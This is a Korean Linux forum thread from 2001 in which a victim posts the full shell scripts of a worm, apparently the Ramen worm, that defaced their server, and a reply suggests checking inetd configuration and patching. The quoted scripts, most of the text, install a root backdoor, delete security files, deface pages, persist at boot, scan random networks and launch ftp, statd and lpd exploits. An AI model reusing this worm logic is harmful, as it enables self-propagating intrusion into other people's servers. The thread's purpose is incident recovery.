>> Read Reply from No. 18287 article  
RE: 해킹화일 전문올립니다..도와주세요

등록 2001-01-19 10:04:00     조회 3
이름 박경호    

		보니까 새소식과 정보 란에 "리눅스 라면바이러스 등장" 이라는 글과
관련이 있을 것 같네요....
 시스템에 큰 문제는 없을 것 같으니 /etc/services하고 /etc/inetd.conf
파일 점검해보시구 수정해 주시면 큰 문제는 없을 것 같네요...
 글구 보안패치 잊지 마시구엽...
  : ftp를 열어놓았었는데...
: 다음 소스로 제 컴을 뽀사붔네요 이잉~
: 홈페이지는 무슨 쪽바리 라면이 뜨고 ...
:
: 관련 화일을 다지우고 restart했는데
: 되네요...그래서 그냥 시스템을 복구하려는데
: 지식이 짧아서요...
: 도와주세요...
:
: #######################################################
: bd62.sh
: #!/bin/sh
:
: cp asp62 /sbin/asp
: echo asp stream tcp nowait root /sbin/asp >> /etc/inetd.conf
: killall -HUP inetd
:
: echo "ftp" >> /etc/ftpusers
: echo "anonymous" >> /etc/ftpusers
: killall -9 rpc.statd
: killall -9 rpc.rstatd
: rm  -f /sbin/rpc.statd
: rm -f /usr/sbin/rpc.rstatd
: touch .w
: touch .l
: #######################################################
: bd7.sh
: cp asp7 /usr/sbin/aspw
: cp asp /etc/xinetd.d
: killall -USR1 xinetd
:
: killall -9 lpd;rm -f /usr/sbin/lpd;touch /usr/sbin/lpd;
:
: touch .
:
: touch .l
:
: #######################################################
: getip.sh
: #!/bin/sh
: PATH="/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin"
: export PATH
:
: route -n | while read A
: do
:
: GW=`echo $A | awk '{printf("%s",$1)}'`
:
: if [ $GW = "0.0.0.0" ]
: then
:
: IFACE=`echo $A | awk '{printf("%s",$8)}'`
:
: ifconfig $IFACE | while read B
:      do
:       CMP=`echo $B | awk '{printf("%s",$1)}'`   
:       if [ $CMP = "inet" ]
:          then
:          MYIP=`echo $B | cut -d: -f 2 | awk '{printf("%s",$1)}'`
:         # echo "my default iface is $IFACE and my ip is $MYIP"
:          echo $MYIP > myip
:          exit
:       fi   
:    done
:   
: fi
: done
:
: ###################################################################
: hackl.sh
: #!/bin/sh
:
: tail -f .l | while read TARGET
: do
: ./lh.sh $TARGET
: done
: ###################################################################
: hackw.sh
: #!/bin/sh
:
: tail -f .w | while read TARGET
: do
: ./wh.sh $TARGET
: done
:
: ###################################################################
: lh.sh
: #!/bin/sh
: ./l $1 -t 0 -r 0xbffff3dc
: ./l $1 -t 0 -r 0xbffff128
: ./l $1 -t 0 -r 0xbffff148
: ./l $1 -t 0 -r 0xbffff3c8
: ./l $1 -t 0 -r 0xbffff488
: ./l $1 -t 0 -r 0xbffff3e8
: ./l $1 -t 0 -r 0xbffff3d8
: ./l $1 brute -t 0
:
:
: #######################################################
: scan.sh
: #!/bin/sh
: if /sbin/route | grep ppp0 >> /dev/null
:  then
:    DEVICE="ppp0"
:    SPEED="dialup"
:  else
:    DEVICE="eth0"
:    SPEED="t1"
: fi
:
:
: while true
:  do
:   CLASSB=`./randb`
:   ./synscan $CLASSB .heh $DEVICE $SPEED 21
: done
:
: #######################################################
: start.sh
: #!/bin/sh
:
: nohup find / -name "index.html" -exec /bin/cp index.html {} ; &
: rm -f /etc/hosts.deny
: ./getip.sh
:
:
: if [ -f /etc/inetd.conf ]
: then
: cp synscan62 synscan
: cp w62 w
: cp l62 l
: cp s62 s
: cp randb62 randb
: echo "/usr/src/.poop/start62.sh" >> /etc/rc.d/rc.sysinit
: ./bd62.sh
: ./start62.sh
:
: else
: cp synscan7 synscan
: cp w7 w
: cp l7 l
: cp s7 s
: cp randb7 randb
: echo "/usr/src/.poop/start7.sh" >> /etc/rc.d/rc.sysinit
: ./bd7.sh
: ./start7.sh
: fi
:
: #######################################################
: start62.sh
: #!/bin/sh
: rm -f .w ;rm -f .l; touch .w; touch .l
:   nohup ./scan.sh &
:   nohup ./hackl.sh &
:   nohup ./hackw.sh &
:
: #######################################################
: start7.sh
: #!/bin/sh
: rm -f .w ;rm -f .l; touch .w; touch .l
:   nohup ./scan.sh &
:   nohup ./hackl.sh &
:   nohup ./hackw.sh &
: #######################################################
: wh.sh
: #!/bin/sh
: ./w -t $1 -s0
: ./s -d0 $1
: #######################################################
:
: #######################################################
:
: #######################################################
:
: #######################################################
:
: --
: 이이잉~--Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!
Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!
Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!
Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!Hack!!
이름
암호


>> 관련글
18287 해킹화일 전문올립니다..도와주세요  초보  2001.01.19  ....
  답장 RE: 해킹화일 전문올립니다..도와주세요  박경호  2001.01.19  ....
Register [ localhost 목록보기 윗글 아랫글
글쓰기
답장쓰기 수정 삭제
정규표현식 [ 상세 검색 ]
페이지로딩: [ 1.35 초 ] 작업시간: [ 0.74 초 ]

Copyleft 1999-2026 by JSBoard Open Project
Theme Designed by IDOO All right reserved
[TOP]

적수네 동네
+
| 적수네 동네
| 공부방
| 리눅스 잡지 서고
| LSN 소스
| 링크 모음
+---+
게시판
+
| 떠들어보세!
| 질문과 답변
| 새소식과 정보
| 1원짜리 팁?
| 대화방
+---+
칼럼?
+
| 세하 훔쳐보기
| Welcome2nite
| 혜진의 염장판
+---+
리눅스 상표권
+
| 반대 서명란
| 토론 게시판
+---+
GNU
+
| GNU 선언문
| GNU GPL
| GNU 미러 목록
+---+
프로젝트?
+
| 리눅스카운터
| RC5DES
| 실질헌법 제작
+---+
커널 소식
+
| 안정 버젼: 2.4.14
+---+
테마 선택
+
LSN 방송국?
+
| OFF AIR
+---+
회원
+
| 로그인
+---+
[ 적수네 동네 ] [ 리눅스 상표권 독점 반대 ] [ 한글 리눅스 문서 프로젝트 ] [ KrLine ] [ 사랑넷 ] [ Valid HTML 4.0! ] [ SlashDot ] [ Freshmeat ]
Copyleft (C) 1998-2001 Byeong-Chan Kim . License
TIME: 1789652819
System by WYZsoft, HDD by I.O.Linux, Mizi Research, Embryo, WOWLINUX, Domain by SarangNet, Network by KrLine.